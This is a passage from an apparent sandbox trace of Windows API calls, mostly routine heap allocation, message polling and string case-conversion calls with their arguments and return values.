lpMsg=0x8bf3a8) returned 0 [0255.394] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0255.394] CharUpperBuffW (in: lpsz="A3800201A3B", cchLength=0xb | out: lpsz="A3800201A3B") returned 0xb [0255.394] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0255.394] CharUpperBuffW (in: lpsz="SSA3800201A3B", cchLength=0xd | out: lpsz="SSA3800201A3B") returned 0xd [0255.394] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0255.394] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0255.394] CharUpperBuffW (in: lpsz="A0200903E22", cchLength=0xb | out: lpsz="A0200903E22") returned 0xb [0255.394] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0255.395] CharUpperBuffW (in: lpsz="SSA0200903E22", cchLength=0xd | out: lpsz="SSA0200903E22") returned 0xd [0255.395] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0255.395] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0255.395] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0255.395] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0255.395] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0255.395] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0255.395] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0255.395] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0255.395] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0255.395] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0255.395] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0255.396] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0255.396] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0255.396] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0255.396] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0255.396] CharUpperBuffW (in: lpsz="A0200C03718", cchLength=0xb | out: lpsz="A0200C03718") returned 0xb [0255.396] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0255.396] CharUpperBuffW (in: lpsz="SSA0200C03718", cchLength=0xd | out: lpsz="SSA0200C03718") returned 0xd [0255.396] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0255.396] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0255.396] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0255.396] CryptReleaseContext (hProv=0xad2940, dwFlags=0x0) returned 1 [0255.397] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a0288 [0255.397] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9d68 [0255.397] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1698 [0255.397] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9af8 [0255.397] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa9b0 [0255.397] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0255.397] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2bb8 [0255.397] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0255.397] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0255.397] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa9b0 | out: hHeap=0x25c0000) returned 1 [0255.397] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa9b0 [0255.397] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0255.397] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1d0 [0255.397] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2bb8 [0255.397] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1d0 | out: hHeap=0x25c0000) returned 1 [0255.398] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0255.398] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0255.398] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0255.398] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1d0 [0255.398] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa248 [0255.398] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2bb8 [0255.398] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa248 | out: hHeap=0x25c0000) returned 1 [0255.398] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0255.398] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1d0 | out: hHeap=0x25c0000) returned 1 [0255.398] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0255.398] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0255.398] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c48 | out: hHeap=0x25c0000) returned 1 [0255.398] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa068 | out: hHeap=0x25c0000) returned 1 [0255.407] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0255.407] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9eb8 | out: hHeap=0x25c0000) returned 1 [0255.407] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d20 | out: hHeap=0x25c0000) returned 1 [0255.407] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa128 | out: hHeap=0x25c0000) returned 1 [0255.407] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f90 | out: hHeap=0x25c0000) returned 1 [0255.407] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa740 | out: hHeap=0x25c0000) returned 1 [0255.407] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ea0 | out: hHeap=0x25c0000) returned 1 [0255.407] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f48 | out: hHeap=0x25c0000) returned 1 [0255.407] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9678 | out: hHeap=0x25c0000) returned 1 [0255.407] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0255.407] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1b8 | out: hHeap=0x25c0000) returned 1 [0255.408] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c00 | out: hHeap=0x25c0000) returned 1 [0255.408] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ba0 | out: hHeap=0x25c0000) returned 1 [0255.408] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0255.408] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa9b0 | out: hHeap=0x25c0000) returned 1 [0255.408] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0255.408] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d68 | out: hHeap=0x25c0000) returned 1 [0255.408] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0255.408] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0288 | out: hHeap=0x25c0000) returned 1 [0255.408] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0255.408] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d68 [0255.408] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0255.408] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0255.408] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ba0 [0255.408] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2c18 [0255.408] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0255.408] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ba0 | out: hHeap=0x25c0000) returned 1 [0255.409] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0255.409] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa9b0 [0255.409] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d930 [0255.409] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0255.409] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0255.409] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0255.409] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9af8 [0255.409] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c00 [0255.409] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1758 [0255.409] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1b8 [0255.409] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0255.409] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1758 [0255.409] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ba0 [0255.409] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0255.409] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ba0 | out: hHeap=0x25c0000) returned 1 [0255.409] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0255.409] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1b8 | out: hHeap=0x25c0000) returned 1 [0255.409] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c00 | out: hHeap=0x25c0000) returned 1 [0255.409] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0255.409] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0255.410] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0255.410] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7e0 [0255.410] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0255.410] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0255.410] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0255.410] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0255.410] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0255.410] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9af8 [0255.410] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c00 [0255.410] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1758 [0255.410] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1b8 [0255.410] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0255.410] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1b8 | out: hHeap=0x25c0000) returned 1 [0255.410] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c00 | out: hHeap=0x25c0000) returned 1 [0255.410] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0255.410] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0255.410] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0255.410] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0255.410] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa9b0 | out: hHeap=0x25c0000) returned 1 [0255.410] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0255.410] FreeLibrary (hLibModule=0x74d40000) returned 1 [0255.410] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0255.411] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d68 | out: hHeap=0x25c0000) returned 1 [0255.411] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0255.411] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0255.411] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0255.411] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0255.411] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a96d8 | out: hHeap=0x25c0000) returned 1 [0255.411] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0255.411] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0255.411] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0255.411] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0255.411] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0255.411] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a96d8 [0255.411] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d68 [0255.411] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1758 [0255.411] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0255.411] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0255.411] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0255.411] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d68 | out: hHeap=0x25c0000) returned 1 [0255.411] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a96d8 | out: hHeap=0x25c0000) returned 1 [0255.411] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0255.411] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0255.412] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0255.412] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0255.412] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a96d8 [0255.412] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9d68 [0255.412] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24ab328 [0255.412] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa9b0 [0255.412] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9af8 [0255.412] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9c00 [0255.412] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ba0 [0255.412] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a96d8 | out: hHeap=0x25c0000) returned 1 [0255.412] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a96d8 [0255.412] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1b8 [0255.412] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0255.412] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0255.412] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0255.412] CloseHandle (hObject=0x294) returned 1 [0255.412] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e40 | out: hHeap=0x25c0000) returned 1 [0255.413] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0255.413] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x3551008 | out: hHeap=0x25c0000) returned 1 [0255.415] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7a0 | out: hHeap=0x25c0000) returned 1 [0255.415] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e30 | out: hHeap=0x25c0000) returned 1 [0255.415] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0255.415] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1b8 | out: hHeap=0x25c0000) returned 1 [0255.415] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d68 | out: hHeap=0x25c0000) returned 1 [0255.415] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0255.415] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0255.415] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa9b0 | out: hHeap=0x25c0000) returned 1 [0255.415] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c00 | out: hHeap=0x25c0000) returned 1 [0255.415] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a96d8 | out: hHeap=0x25c0000) returned 1 [0255.415] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ba0 | out: hHeap=0x25c0000) returned 1 [0255.415] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0255.415] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1908 [0255.415] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0255.416] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0255.416] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e30 [0255.416] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a96d8 [0255.416] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c00 [0255.416] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0255.416] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa9b0 [0255.416] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0255.416] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa9b0 | out: hHeap=0x25c0000) returned 1 [0255.416] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c00 | out: hHeap=0x25c0000) returned 1 [0255.416] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a96d8 | out: hHeap=0x25c0000) returned 1 [0255.416] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0255.416] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e30 | out: hHeap=0x25c0000) returned 1 [0255.416] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0255.416] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0255.416] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a96d8 [0255.416] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9c00 [0255.416] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa9b0 [0255.416] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9af8 [0255.416] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0255.416] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9d68 [0255.417] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ba0 [0255.417] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a96d8 | out: hHeap=0x25c0000) returned 1 [0255.417] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a96d8 [0255.417] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1b8 [0255.417] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0255.417] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1908 [0255.417] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0255.417] CloseHandle (hObject=0x1f8) returned 1 [0255.420] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95d0 | out: hHeap=0x25c0000) returned 1 [0255.420] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0255.420] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b7a48 | out: hHeap=0x25c0000) returned 1 [0255.421] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d860 | out: hHeap=0x25c0000) returned 1 [0255.421] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0255.421] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0255.421] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1b8 | out: hHeap=0x25c0000) returned 1 [0255.421] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c00 | out: hHeap=0x25c0000) returned 1 [0255.421] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa9b0 | out: hHeap=0x25c0000) returned 1 [0255.421] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0255.421] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0255.421] HeapFree (in: 